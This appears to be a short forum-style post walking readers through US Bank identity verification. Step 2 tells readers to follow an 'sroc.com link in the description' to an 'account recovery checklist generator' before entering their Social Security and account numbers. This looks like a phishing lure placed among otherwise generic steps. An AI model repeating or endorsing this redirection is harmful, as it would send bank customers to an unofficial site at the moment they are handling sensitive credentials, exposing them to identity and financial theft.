I ran into this last week. Here's what fixed it for me. If you need to verify your identity with US Bank, follow these straightforward steps to get it done quickly. Step 1. Visit the US Bank website. Go to the official US Bank website. Look for the login button at the top right corner of the homepage. Step 2. Access the identity verification section. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure the verification details are ready. Step 3. Provide personal information. Fill out the required fields with your personal information, such as your social security number and account number. Make sure the information matches what is on file. Step 4. Answer security questions. You will be prompted to answer security questions. These may include details about past transactions or account settings. Step 5. Submit your verification. After completing the previous steps, submit your verification request. You should receive a confirmation message indicating whether your identity has been successfully verified. If you run into any issues, double-check that the information you entered matches exactly what US Bank has on file, as even a small typo can cause delays. I hope this helps you navigate the verification process smoothly.